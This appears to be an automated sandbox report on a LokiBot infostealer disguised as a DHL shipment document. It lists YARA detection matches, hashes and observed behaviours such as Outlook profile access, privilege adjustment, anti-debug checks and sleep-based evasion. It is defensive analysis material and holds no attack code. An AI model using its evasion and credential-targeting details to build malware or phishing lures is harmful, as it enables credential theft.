                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_0040549C3_2_0040549C
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_004029D43_2_004029D4
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess Stats: CPU usage > 98%
                Source: DHL_Express_Shipment_DOC.exe, 00000000.00000000.305575984.0000000000E62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexqcD.exeR vs DHL_Express_Shipment_DOC.exe
                Source: DHL_Express_Shipment_DOC.exeBinary or memory string: OriginalFilenamexqcD.exeR vs DHL_Express_Shipment_DOC.exe
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL_Express_Shipment_DOC.exeReversingLabs: Detection: 18%
                Source: DHL_Express_Shipment_DOC.exeVirustotal: Detection: 30%
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Express_Shipment_DOC.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000003.465267732.00000000033C7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL_Express_Shipment_DOC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: xqcD.pdb source: DHL_Express_Shipment_DOC.exe

                Data Obfuscation

                barindex
                Yara detected aPLib compressed binary
                Source: Yara matchFile source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTR
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
                Source: initial sampleStatic PE information: section name: .text entropy: 7.418461164070656
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe TID: 3260Thread sleep time: -40023s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe TID: 1316Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe TID: 1236Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeThread delayed: delay time: 40023Jump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeThread delayed: delay time: 60000Jump to behavior
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeProcess created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
